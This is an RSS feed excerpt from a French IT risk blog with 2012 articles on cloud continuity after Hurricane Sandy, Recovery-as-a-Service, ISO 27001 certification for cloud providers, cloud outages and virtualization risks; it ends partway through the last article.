<p><em>Des sinistres de cette ampleur ont permis d’alerter les DSI sur leur exposition face aux risques naturels. La régularité et la violence de ces évènements climatiques ont poussé les entreprises à prendre des mesures pour faire face à de futures tempêtes de la dimension de «Sandy». Les leçons du passé ont-elles pour autant été retenues ? Ont-elles toutes réussi ce test grandeur nature ? si oui, comment y sont- elles parvenues ?</em></p>
<p><span id="more-2778"></span></p>
<h2>Les conséquences de l’ouragan « Sandy »</h2>
<p>Annoncé comme une catastrophe majeure dans l’histoire des États-Unis, l’ouragan « Sandy » a capté l’attention de la plupart des DSI des acteurs économiques de la côte Est qui ont mobilisé leurs efforts pour déclencher leurs plans de continuité informatique. Ces PCI, mis à niveau depuis les attentats du 11 Septembre 2001, sont fondés notamment sur des procédés de géo-réplication.</p>
<p>Les acteurs du web et plus largement du marché du cloud sont plus enclins à communiquer sur leur capacité de reprise et à faire des retours sur les incidents subis que les entreprises traditionnelles. Les informations disponibles proviennent donc essentiellement de ces acteurs.</p>
<p>De nombreuses pannes d&rsquo;électricité causées par la tempête, ont entraîné une indisponibilité partielle ou totale de services (Huffington Post, Gawker, Cafemon, Gizmodo, Buzzfeed, etc.) dans bon nombre de datacenters. Les hébergeurs et fournisseurs de services cloud <strong>Datagram</strong> et<strong> 75 Broad</strong> ont été indisponibles à causes d’inondations ou réserves insuffisantes de carburant pour le fonctionnement des groupes électrogènes.</p>
<p>« Sandy » a ainsi rendu apparente la vulnérabilité des nombreux datacenters présents dans cette zone (New York, New Jersey, et Virginie) des États-Unis. En effet, plusieurs centres de données géo-répliqués n’étaient distants que d’une centaine de kilomètres (150 datacenters) et donc dans le rayon d’impact de Sandy.</p>
<p>Ces dysfonctionnements mettent en exergue la nécessité, même pour des PCI bien pensés comme ceux de Wall Street, d’être mis à l’épreuve dans des conditions proches de la réalité, avant d’être jugés comme fiables.</p>
<h2><strong> Des PCI à l&rsquo;épreuve des ouragans </strong></h2>
<p>Certains opérateurs de datacenter, comme <a href="http://searchcloudprovider.techtarget.com/news/2240170482/Hurricane-Sandys-wake-How-did-providers-data-center-DR-plans-do"><strong>Telx</strong></a>, ont résisté à Sandy car ils avaient appliqué précédemment des tests simulant jusqu’au bout un sinistre. Par cette initiative, Telx a pu identifier certaines insuffisances dans son PCI comme la surchauffe de ses générateurs en mode dégradé et a donc pu limiter l’impact de Sandy.</p>
<p>Un cas d’école est celui de Buzzfeed qui, malgré le crash de Datagram qui hébergeait ses serveurs primaires, a réussi à réduire considérablement le temps d’indisponibilité de ses services. Cette réussite s’explique par :</p>
<ul>
<li>la mise en cache de la plupart de ses pages chez Akamai, le gestionnaire et diffuseur de contenu</li>
<li>l’hébergement dans un second datacenter des données répliquées en temps réel.</li>
</ul>
<p>La réplication de ces données a permis le rétablissement des services de Buzzfeed chez Amazon Web services (AWS). Quelques heures ont suffi pour assurer la migration complète des données vers AWS et ainsi basculer leur service sur les infrastructures d’Amazon. Cet exploit est à relativiser car il a nécessité la configuration manuelle d’une bonne partie du socle technique de Buzzfeed et reste donc peu applicable en l’état à un SI complexe.</p>
<h2>Les leçons de « Sandy »</h2>
<p>Chaque incident majeur est une façon pour les Grands Comptes d’apprendre par le réel et d’anticiper les futures catastrophes. Au-delà d’une stratégie multi-datacenters, Sandy a  mis en exergue la nécessité d’anticiper, de tester et d’adapter le PCI.</p>
<p>Elle a aussi révélé le cloud comme une alternative envisageable pour réaliser un PCI. Alternative que les offreurs cloud commencent à mettre en avant par le biais de leurs offres packagées de <a title="Recovery-as-a-Service (RaaS) : une révolution pour le secours informatique ?" href="http://www.solucominsight.fr/2012/06/recovery-as-a-service-raas-une-revolution-pour-le-secours-informatique/">Disaster Recovery As A Service.</a></p>
<p>Les entreprises européennes et notamment françaises, qui ont moins l’occasion de mettre à l’épreuve de la réalité leur PCI, devraient néanmoins s’inspirer des retours d’expériences plus nombreux acquis par les américains. D’autant plus que les hébergeurs de cloud ne rechignent pas à communiquer sur leur stratégie PCI gagnante afin d’en faire un argument marketing. En effet, même si moins fréquentes, l’Europe n’est pas à l’abri de catastrophes équivalentes en termes d’impact à « Sandy ».</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2012/12/les-plans-de-continuite-informatique-des-cloud-a-lepreuve-de-louragan-sandy/">Les plans de continuité informatique des cloud à l’épreuve de l’ouragan Sandy</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>L&#8217;actualité IT commentée par Gérôme Billois sur BFM Business</title>
		<link>https://www.riskinsight-wavestone.com/2012/12/lactualite-it-commentee-par-gerome-billois-sur-bfm-business/</link>
		
		<dc:creator><![CDATA[Gérôme Billois]]></dc:creator>
		<pubDate>Tue, 18 Dec 2012 09:52:25 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Métiers - Marketing et relation client]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Cybercriminalité]]></category>
		<category><![CDATA[Wifi]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=2716</guid>

					<description><![CDATA[<p>Gérôme Billois a commenté l’actualité IT de la semaine dans l’émission IT for Business présentée par Frédéric Simottel sur BFM Business et diffusée samedi 15/12 à 20h15. Retrouvez son intervention !  </p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2012/12/lactualite-it-commentee-par-gerome-billois-sur-bfm-business/">L&rsquo;actualité IT commentée par Gérôme Billois sur BFM Business</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Gérôme Billois a commenté l’actualité IT de la semaine dans l’émission IT for Business présentée par Frédéric Simottel sur BFM Business et diffusée samedi 15/12 à 20h15. Retrouvez son intervention !</p>
<div> <iframe loading="lazy" src="http://www.youtube.com/embed/tJn3H1VuWwg" width="425" height="350" frameborder="0"></iframe></div>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2012/12/lactualite-it-commentee-par-gerome-billois-sur-bfm-business/">L&rsquo;actualité IT commentée par Gérôme Billois sur BFM Business</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Recovery-as-a-Service (RaaS) : une révolution pour le secours informatique ?</title>
		<link>https://www.riskinsight-wavestone.com/2012/06/recovery-as-a-service-raas-une-revolution-pour-le-secours-informatique/</link>
		
		<dc:creator><![CDATA[Mickael Avoledo]]></dc:creator>
		<pubDate>Mon, 25 Jun 2012 11:55:33 +0000</pubDate>
				<category><![CDATA[Cloud & Next-Gen IT Security]]></category>
		<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Cloud security]]></category>
		<category><![CDATA[RaaS]]></category>
		<category><![CDATA[recovery]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=1960</guid>

					<description><![CDATA[<p>Non contents d’avoir déjà décliné une bonne partie des lettres de l’alphabet à la sauce « As A Service », les fournisseurs de service en ont trouvé un nouveau : le « Recovery-as-a-Service » ou RaaS [1]. Arrivées vers la fin 2009 aux États-Unis par...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2012/06/recovery-as-a-service-raas-une-revolution-pour-le-secours-informatique/">Recovery-as-a-Service (RaaS) : une révolution pour le secours informatique ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Non contents d’avoir déjà décliné une bonne partie des lettres de l’alphabet à la sauce « <em>As A Service</em> », les fournisseurs de service en ont trouvé un nouveau : le « <em>Recovery-as-a-Service</em> » ou <em>RaaS</em> [1]. Arrivées vers la fin 2009 aux États-Unis par le biais de startups, les offres <em>RaaS</em> y sont désormais proposées par les principaux acteurs de la continuité informatique, Sungard Availability Services et IBM BC&amp;RS en tête. Alors le <em>RaaS</em>, révolution ou pas ?</p>
<h2>Le <em>RaaS </em>: fer de lance des « <em>Cloud Recovery Services</em> »</h2>
<p>Comme pour beaucoup de ce qui tourne autour du cloud, il est parfois difficile de donner une définition précise de ce dont on parle, tant une même appellation peut cacher des offres différentes. Nous utiliserons la définition suivante : <em>« Cloud Recovery Service =&gt; </em><em>secours d’un système d’information sur une infrastructure virtualisée, hébergée par un tiers, disponible à la demande et facturée à l’utilisation. »</em></p>
<p>L’éventail des possibilités est très large :</p>
<ul>
<li> d’une sauvegarde externalisée des données critiques en mode cloud (« <em>Backup-as-a-Service</em> ») …</li>
<li> …en passant par la construction par le client lui-même de son secours sur la base d’une prestation de type « <em>IaaS</em> » [2] …</li>
<li>  …jusqu’à une offre complètement managée intégrant le suivi du SI nominal et des mécanismes de bascule planifiés. C’est ce type de prestations que l’on retrouve sous l’appellation « <em>Recovery-as-a-Service</em> ».</li>
</ul>
<h2> Quel est l’intérêt de passer au <em>RaaS</em> ?</h2>
<p>L’utilisation du <em>RaaS</em> résulte avant tout d’un choix économique. Sur le papier du moins, le secours paraît adapté au modèle de facturation du cloud (pas de sinistre &gt; allocation limitée de ressources &gt; coût d’utilisation réduit), alors qu’un secours traditionnel implique de stocker, héberger et faire évoluer des infrastructures, des serveurs et des applications sur un site de secours.</p>
<p>Mais à y regarder de plus près, les économies ne sont pas toujours au rendez-vous et varient grandement en fonction des applications. Si certaines d’entre elles, peu consommatrices de données, sont les candidates idéales pour le <em>RaaS</em> (des études indépendantes font état d’environ 80% d’économies [3] pour leur secours par rapport à l’approche traditionnelle), le ROI pour les applications plus lourdes et/ou pour lesquels les exigences de continuité sont plus fortes s’avère discutable. En effet, plus les RTO et RPO seront exigeants, plus le niveau de service devra être élevé (allocation renforcée de ressources, mécanismes de réplication des données site-à-site, liens sécurisés, supervision 24/7, etc.) entraînant une envolée des coûts à la clef.</p>
<p>Le <em>RaaS</em> s’assimile, à ce stade de sa maturité, au mieux à du « <em>warm recovery</em> ». En effet, il est aujourd’hui illusoire de penser que les solutions proposées permettront de la haute-disponibilité : délais d’activation, délais relatifs aux opérations de bascule notamment au niveau du réseau, délais de restauration en cas de corruption des données, etc.</p>
<p>En outre, le RaaS repose essentiellement sur des mécanismes de virtualisation de serveurs (le plus souvent restreints aux architectures Intel x86, à l’exception de quelques fournisseurs), que ne supportent pas tous les progiciels du marché, a fortiori les applications propriétaires des clients.</p>
<p>Ainsi, le fait de vouloir tirer pleinement parti de la compétitivité économique du RaaS tout en répondant aux besoins Métiers réduit son utilisation à une certaine catégorie d’applications. Ce faisant, il cantonne le RaaS en tant que solution complémentaire à un secours traditionnel, ce qui peut paradoxalement devenir une source de complexité, du fait de la cohabitation de deux SI de secours. Néanmoins, deux cas d’usage du RaaS émergent pour les organisations concernées :</p>
<ul>
<li> La couverture des applications virtualisées ou éligibles à la virtualisation à coût optimisé</li>
<li> L’extension du secours à des périmètres qui n’auraient pas pu être intégrés au Plan de Continuité Informatique de l’organisation, pour une meilleure couverture au meilleur coût.</li>
</ul>
<p>&nbsp;</p>
<h2>A qui s’adressent les offres <em>RaaS</em> ?</h2>
<p>Étant donné son modèle économique et sa structure technique, le <em>RaaS</em> semble plus adapté aux moyennes structures (qui n’ont pas souvent la surface financière pour mettre en œuvre et gérer en propre un site de secours) et notamment à celles qui ont opéré la virtualisation de leur SI. Les études prospectives [4] le montrent : ce sont elles qui tireront la croissance de ce marché dans les prochaines années.</p>
<p>Les grandes organisations déjà dotées de Plans de Continuité Informatique seront probablement moins intéressées mais pourront néanmoins trouver dans le <em>RaaS</em> des réponses ciblées à certains de leurs besoins.</p>
<h2>Le <em>RaaS</em> : une offre mature ?</h2>
<p>Comme pour nombre de <em>cloud services</em>, le <em>RaaS</em> n’a pas encore atteint sa pleine maturité : en témoigne le foisonnement des offres et des prestataires notamment aux États-Unis et au Royaume-Uni. Au-delà des acteurs historiques de la continuité informatique se positionnent des <em>pure-players</em> des <em>cloud recovery services</em> et de plus en plus des hébergeurs informatiques, convertis au <em>cloud</em>.</p>
<p>Le marché se structure, les offres évoluent en recherchant notamment de la complémentarité avec les <em>cloud services</em> : des initiatives d’interopérabilité entre services <em>IaaS</em> et <em>RaaS</em> se font jour pour assurer du secours « cloud-to-cloud » par exemple.</p>
<p>A ce stade et en terme de couverture de risques, le <em>RaaS</em> doit faire ses preuves. Concrètement les infrastructures dévolues au <em>RaaS</em> reposent sur encore peu de datacenters. Le client qui souhaitera se prémunir de sinistres affectant des zones géographiques particulières (ou étendues) devra se rapprocher du fournisseur de service <em>RaaS</em> qui l’intéresse pour vérifier que son ou ses sites ne sont pas exposés aux mêmes risques.</p>
<p>En France, le marché reste jeune et sans retour d’expérience significatif de déploiement. Les grands offreurs français s’appuient, aujourd’hui, sur les infrastructures anglo-saxonnes ou nord-américaines de leur maison-mère (ce qui potentiellement impacte la qualité de service, le niveau de sécurité, les engagements contractuels, etc.). Reste donc aux acteurs, anciens comme nouveaux, à démontrer toute la pertinence de leurs offres, en particulier sur la gamme des services managés, probablement les plus recherchés par les DSI.</p>
<p>&nbsp;</p>
<p><em>[1] On rencontre également l’acronyme DRaaS (Disaster Recovery-as-a-Service)</em></p>
<p><em>[2] IaaS : Infrastructure-as-a-Service</em></p>
<p><em>[3] « </em><a href="http://static.usenix.org/event/hotcloud10/tech/full_papers/Wood.pdf"><em>Disaster Recovery as a Cloud Service : Economic Benefits &amp; Deployment Challenges</em></a><em> »</em></p>
<p><em>[4] « Gartner Says 30 Percent of Midsize Companies Will Use Recovery-as-a-Service by 2014 »</em></p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2012/06/recovery-as-a-service-raas-une-revolution-pour-le-secours-informatique/">Recovery-as-a-Service (RaaS) : une révolution pour le secours informatique ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>ISO 27001,  un passage obligé pour les fournisseurs de services dans le cloud ?</title>
		<link>https://www.riskinsight-wavestone.com/2012/06/iso-27001-un-passage-oblige-pour-les-fournisseurs-de-services-dans-le-cloud/</link>
		
		<dc:creator><![CDATA[Marion Couturier]]></dc:creator>
		<pubDate>Thu, 07 Jun 2012 11:26:03 +0000</pubDate>
				<category><![CDATA[Cloud & Next-Gen IT Security]]></category>
		<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Cloud security]]></category>
		<category><![CDATA[ISO 27001]]></category>
		<category><![CDATA[SMSI]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=1887</guid>

					<description><![CDATA[<p>Google a la semaine passée annoncé en grande pompe l’obtention de la certification ISO 27001 pour ses services Google Apps for Business. Mais quels sont donc les bénéfices d’une telle certification pour un fournisseur de service comme Google ? Certifier le...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2012/06/iso-27001-un-passage-oblige-pour-les-fournisseurs-de-services-dans-le-cloud/">ISO 27001,  un passage obligé pour les fournisseurs de services dans le cloud ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Google a la semaine passée annoncé en grande pompe l’obtention de la certification ISO 27001 pour ses services Google Apps for Business. Mais quels sont donc les bénéfices d’une telle certification pour un fournisseur de service comme Google ?</p>
<h2><strong>Certifier le management de la sécurité, pas un niveau de sécurité</strong></h2>
<p>Tout d’abord, bref retour sur un point majeur trop souvent oublié : la norme ISO 27001 ne certifie pas un niveau de sécurité, mais son management. Cette norme, qui énonce les exigences à mettre en œuvre pour l’implémentation d’un Système de Management de la Sécurité de l’Information (SMSI), vise à mettre en place le management de la sécurité et à s’assurer de son amélioration continue sur le périmètre de la certification.</p>
<p><span id="more-1887"></span>Le choix des mesures et du niveau de sécurité en place est donc fait en réponse aux risques et exigences identifiés par les parties prenantes : un choix nécessairement validé par le management ! Contrairement à un standard « catalogue » comme PCI-DSS où toutes les mesures doivent être implémentées pour arriver à la certification, l’audit ISO 27001 ne vérifiera que les mesures sélectionnées comme apportant une réponse aux risques. Une différence de taille, qui pousse vers une sécurité pragmatique mais en contrepartie nécessite une analyse des risques de sécurité de qualité et une attention particulière de l’auditeur externe.</p>
<h2>U<strong>n périmètre solide</strong></h2>
<p>De nombreuses entreprises affichent des certifications, mais il est souvent nécessaire pour les clients de s’attarder sur la lecture du périmètre pour en connaître la valeur : un périmètre très limité par rapport à l’utilisation de leurs données peut être trompeur !</p>
<p>Ce n’est pas le cas ici, puisque Google présente une certification ISO 27001 qui couvre l’ensemble des systèmes, collaborateurs, processus et datacenters qui permettent de délivrer le service Google Apps. Cela inclut les services  GMail, Google Talk, Google Calendar, Google Docs (documents, spreadsheets, presentations), Google Sites, Control Panel (CPanel), Google Contacts, Google Video, Google Groups, mais aussi les briques support (Directory Sync, Provisioning API, SAML-Based SSO API, Reporting API, Audit API). C’est un périmètre impressionnant au vu de la couverture des services, tant sur le plan fonctionnel que géographique !</p>
<h2><strong>Développer la confiance et diminuer le nombre d’audits</strong></h2>
<p>A l’heure où de plus en plus d’entreprises se posent la question de l’opportunité d’externaliser les services de bureautiques comme la messagerie, l’édition de documents, etc., rassurer les responsables de la sécurité en garantissant les meilleures pratiques de management de la sécurité ne peut qu’être positif en termes marketing. Au-delà de l’apport de confiance, c’est également pour Google la garantie d’une reconnaissance externe, sanctionnée par un organisme de certification indépendant, qui pourra diminuer le nombre ou la charge d’audits des clients. Un bénéfice opérationnel non négligeable &#8211; même si Google n’était pas très enclin à se faire auditer !</p>
<p>Si Google a largement communiqué sur l’obtention de la certification, la firme de Mountain View n’a pas été la première à se lancer dans l’aventure : Amazon web services et Microsoft Office 365 ont déjà fait l’objet de la mise en place de SMSI certifiés. Après les infogérants, l’ISO 27001 serait donc en passe de devenir le standard de référence pour la sécurité des services dans le Cloud : on ne peut que se réjouir de ce mouvement qui rassurera les entreprises clientes de ces services. Celles-ci ne doivent cependant pas considérer la certification comme un niveau de sécurité « garantie » et rester attentive aux périmètres et aux mesures mises en place concrètement.</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2012/06/iso-27001-un-passage-oblige-pour-les-fournisseurs-de-services-dans-le-cloud/">ISO 27001,  un passage obligé pour les fournisseurs de services dans le cloud ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Panne Facebook : symptomatique de la résilience du cloud computing ?</title>
		<link>https://www.riskinsight-wavestone.com/2012/03/panne-facebook-symptomatique-de-la-resilience-du-cloud-computing/</link>
		
		<dc:creator><![CDATA[Frederic Chollet]]></dc:creator>
		<pubDate>Tue, 13 Mar 2012 11:08:58 +0000</pubDate>
				<category><![CDATA[Cloud & Next-Gen IT Security]]></category>
		<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Cloud security]]></category>
		<category><![CDATA[continuité d'activité]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=1609</guid>

					<description><![CDATA[<p>Après les 3 jours d’arrêt du service BlackBerry en octobre dernier, la panne majeure du service Microsoft Windows Azure le 29 février dernier, voilà que l’emblématique site du social networking aux 850 millions d’abonnés connait lui aussi une interruption ce...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2012/03/panne-facebook-symptomatique-de-la-resilience-du-cloud-computing/">Panne Facebook : symptomatique de la résilience du cloud computing ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Après les 3 jours d’arrêt du service BlackBerry en octobre dernier, la panne majeure du service Microsoft Windows Azure le 29 février dernier, voilà que l’emblématique site du social networking aux 850 millions d’abonnés connait lui aussi une interruption ce mardi 7 mars. Qui, parmi les innombrables nouveaux acteurs du <em>cloud</em>, nouvel eldorado économique de la sphère IT, sera le prochain concerné ?</p>
<h2><strong>En matière de disponibilité, les promesses du <em>cloud</em> n’engagent que ceux qui y croient !</strong></h2>
<p>L’Hyper Cycle 2011 du Gartner a positionné en août dernier <a href="http://www.silicon.fr/gartner-classement-2011-de-maturite-des-technologies-le-cloud-decroche-58084.html" target="_blank" rel="noopener noreferrer">le cloud dans sa phase de « désillusion »</a>. Force est de constater que les incidents à répétition que rencontrent les grands noms du cloud depuis l’année passée ne font que confirmer cette état de « disgrâce ».  Petit rappel des deux faits marquants de ce début d’année.</p>
<p>Le 29 février à 1h45 (GMT), la plate-forme de cloud services Windows Azure tombe sur 4 de ses 6 plaques mondiales pendant une durée oscillant entre 12h et 48h. Cette interruption de services a son origine dans un bogue logiciel générant une erreur de calcul de dates sur les années bissextiles ; à la décharge de Microsoft,  il est vrai qu’Azure ouvert en 2010 n’a pas connu d’autre année bissextile que 2012. Cette panne a laissé sur le carreau plusieurs sites clés, dont la fameuse place de marché du gouvernement britannique, le «<a href="http://www.govstore.net" target="_blank" rel="noopener noreferrer"> CloudStore</a> ».</p>
<p>Ce 7 mars vers 5h (GMT), le service Facebook tombe en panne plus de 3 heures sur les plaques  Europe, Afrique et Moyen-Orient. Principale cause avancée, celle de la défaillance des serveurs DNS européens de Facebook entraînant l’inaccessibilité du site. Pointés du doigt, les Anonymous ont démenti être mêlés à cet incident. En tout état de cause, le communiqué officiel de Facebook ne laisse filtrer aucune explication. Rappelons-nous que Facebook avait déjà rencontré un problème de configuration BGP en août 2010.</p>
<p>Ces deux incidents majeurs font écho aux non moins médiatiques pannes rencontrées par les promoteurs du <em>cloud computing</em> ; remémorons-nous les incidents de Google (trois en 2009, celle de 05/2010, puis de 02/2011 et 09/2011), d’Amazon et de son service EC2 (12/2010, 04/2011, 08/2011), du précurseur Salesforce.com (02/2008, 01/2009, 01/2010) et du plus récent VMware Cloud Foundry (05/2011).</p>
<p>S’agissant de « résilience », les atouts du cloud ont maintes fois été présentés, on citera en substance :</p>
<ul>
<li>Taux de disponibilité avantageux (Salesforce.com affiche 99,9%)</li>
<li>Répartition et duplication des ressources sur des lieux géographiques différents</li>
<li>Accessibilité permanente, en tout point du globe</li>
<li>Standardisation de l’offre technique, facilitant sa reproductibilité sur les datacenters</li>
</ul>
<p>Pour autant, le <em>cloud</em> n’en reste pas moins une machinerie complexe par construction ; du fait de l’empilement des services qui le composent, du volume des ressources qui le constitue et, paradoxalement, de leur répartition sur le globe.</p>
<p>Au-delà de cette complexité qui impacte les gestes d’exploitation et de maintenance au quotidien s’ajoutent également les risques posés par le modèle de standardisation retenu. Les effets d’une erreur de manipulation, d’un bogue ou d’une vulnérabilité se font ressentir rapidement sur tout ou partie des infrastructures sous-jacentes.</p>
<p>Difficile dans ces conditions, face à des offres « boîtes noires » peu dissertes sur leur fonctionnement interne, d’accorder un crédit sans limite aux niveaux de disponibilité avancés. Du reste, le cloud public, universel dans son usage et par sa fréquentation, ne permet pas de préjuger de la manière et avec quelle priorité seront traitées, en cas de sinistre, les entreprises (grandes ou petites) en regard des individuels que nous sommes.</p>
<h2><strong>Des axes de progrès pour une meilleure résilience du <em>cloud</em></strong></h2>
<p>Ces incidents à répétition témoignent d’une maturité encore insuffisante du marché et des fournisseurs, qui fonctionnent encore pour certains « au coup par coup ». Pour autant, le tableau n’est pas si noir, le modèle vertueux d’amélioration continue se met en place, sous l’impulsion notamment de l’alliance <a href="http://www.cloudsecurityalliance.org" target="_blank" rel="noopener noreferrer">CSA</a> (cloud security alliance)  qui promeut de bonnes pratiques en matière de sécurité et de résilience du cloud, des exigences d’acteurs clefs et /ou de gouvernements (PCI DSS, FISMA, HIPAA, etc.) et, il faut bien le dire, au gré des incidents vécus.</p>
<p>D’autant que la problématique de continuité tout comme de sécurité est au cœur des préoccupations des fournisseurs de service ; en affectant la confiance de leurs clients, présents et futurs, elle touche directement leur business model. Rappelons-nous enfin que l’une des promesses essentielles du <em>cloud computing</em> est d’améliorer la résilience du service rendu, parce qu’il est précisément « partout dans le nuage ».</p>
<p>A y regarder de plus près, le nombre d’incidents rencontrés par les acteurs du <em>cloud</em> est équivalent sinon inférieur à ce que rencontrent les entreprises. Le principal facteur aggravant tient au fait que la surface d’impact est sans commune mesure avec celles des SI des entreprises (ce sont des dizaines de milliers voire de millions d’usagers qui sont touchés).</p>
<p>Les fournisseurs de service entrent doucement dans la phase de maturation de leurs offres ; ils renforcent progressivement leurs dispositifs de continuité, prennent davantage en compte le facteur humain (source indéfectible d’erreur !) et apprennent aussi à mieux communiquer auprès de leurs clients.</p>
<p>Mais il ne faut pas croire au <em>cloud</em> « infaillible ». Aussi, les entreprises consommatrices de services cloud doivent-elles prévoir des processus de continuité de leurs métiers les plus sensibles et de préservation de leurs données les plus critiques.</p>
<p>C’est enfin le prochain challenge des fournisseurs que de prouver et démontrer les performances de leurs services cloud face à ceux des SI des grandes organisations !</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2012/03/panne-facebook-symptomatique-de-la-resilience-du-cloud-computing/">Panne Facebook : symptomatique de la résilience du cloud computing ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>La virtualisation ne virtualise pas les risques humains !</title>
		<link>https://www.riskinsight-wavestone.com/2012/02/la-virtualisation-ne-virtualise-pas-les-risques-humains/</link>
		
		<dc:creator><![CDATA[SolucomINSIGHT]]></dc:creator>
		<pubDate>Mon, 27 Feb 2012 11:02:17 +0000</pubDate>
				<category><![CDATA[Cloud & Next-Gen IT Security]]></category>
		<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Métiers - Stratégie & projets IT]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Infrastructure]]></category>
		<category><![CDATA[optimisation]]></category>
		<category><![CDATA[poste de travail]]></category>
		<category><![CDATA[Risque]]></category>
		<category><![CDATA[virtualisation]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=1477</guid>

					<description><![CDATA[<p>La virtualisation : un buzzword aux origines lointaines Le concept de virtualisation existe depuis plus de 40 ans (avec les mainframe et systèmes IBM), mais s’est véritablement démocratisé dans les années 2000 lorsqu’il est devenu possible d’exécuter simultanément plusieurs systèmes...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2012/02/la-virtualisation-ne-virtualise-pas-les-risques-humains/">La virtualisation ne virtualise pas les risques humains !</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h2>La virtualisation : un buzzword aux origines lointaines</h2>
<p>Le concept de virtualisation existe <strong>depuis plus de 40 ans</strong> (avec les mainframe et systèmes IBM), mais s’est véritablement démocratisé dans les années 2000 lorsqu’il est devenu possible d’exécuter simultanément plusieurs systèmes d’exploitation sur un même poste de travail. C&rsquo;est essentiellement grâce à la virtualisation système (Microsoft, VMware) qu&rsquo;il est aujourd’hui connu et son succès a atteint des sommets avec le développement du « <strong>cloud computing</strong> » (Amazon, Google Apps&#8230;).</p>
<p>La virtualisation consiste à faire fonctionner sur une machine physique unique <strong>plusieurs systèmes</strong> comme s&rsquo;ils fonctionnaient sur des <strong>machines physiques distinctes</strong>. Ceci repose sur un concept simple : des instances virtuelles sont orchestrées par un hyperviseur, garant de l’accès, la répartition des ressources et l’isolation entre les instances.</p>
<p><a href="http://www.solucominsight.fr/2012/02/la-virtualisation-ne-virtualise-pas-les-risques-humains/image-virtualisation-solucominsight/" rel="attachment wp-att-1478"><img loading="lazy" decoding="async" class="aligncenter size-medium wp-image-1478" title="Image virtualisation SolucomINSIGHT" src="http://www.solucominsight.fr/wp-content/uploads/2012/02/Image-virtualisation-SolucomINSIGHT-437x120.jpg" alt="" width="437" height="120" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2012/02/Image-virtualisation-SolucomINSIGHT-437x120.jpg 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2012/02/Image-virtualisation-SolucomINSIGHT-71x20.jpg 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2012/02/Image-virtualisation-SolucomINSIGHT.jpg 1411w" sizes="auto, (max-width: 437px) 100vw, 437px" /></a></p>
<p>La virtualisation doit avant tout son utilisation aux <strong>gains financiers</strong> qu&rsquo;elle apporte en favorisant la consolidation des infrastructures et l’optimisation des ressources utilisées. Elle engendre en même temps des <strong>bénéfices opérationnels</strong> importants en permettant la mise en place rapide de solutions en haute disponibilité : le passage au « tout logique » apporte une facilité de déploiement et une souplesse de provisionning non offerts dans le monde physique.</p>
<p>En 40 ans, au vu de ces bénéfices, les technologies de virtualisation se sont orientées vers des utilisations diverses, s&rsquo;étendant à d’<strong>autres composants du SI</strong> que les systèmes d&rsquo;exploitation d&rsquo;origine : postes de travail (sessions virtuelles, VDI…), réseaux (VDC, VRF…), équipements de sécurité (Firewalls, IDS-IPS&#8230;).</p>
<h2>Des risques technologiques … à relativiser !</h2>
<p>Les premières craintes des entreprises vis-à-vis de la virtualisation sont liées à la <strong>fiabilité des</strong> <strong>nouveautés technologiques impliquées</strong> : les nouveaux composants introduits, en particulier l&rsquo;hyperviseur, me garantissent-ils l&rsquo;étanchéité des systèmes supportés par une même machine physique ?</p>
<p>Il existe effectivement un certain nombre de vulnérabilités exploitables sur ces technologies… mais les risques associés sont finalement peu rencontrés : les technologies phares du marché sont des technologies éprouvées et ces risques peuvent être traités, comme pour tout système, par des mesures de gestion opérationnelles de la sécurité qui sont déjà en place dans les entreprises (patch management, durcissement…). Attention cependant ces processus doivent fonctionner avec efficacité vu l’impact en cas d’incident sur les infrastructures de virtualisation.</p>
<h2>Des risques humains … à ne pas négliger !</h2>
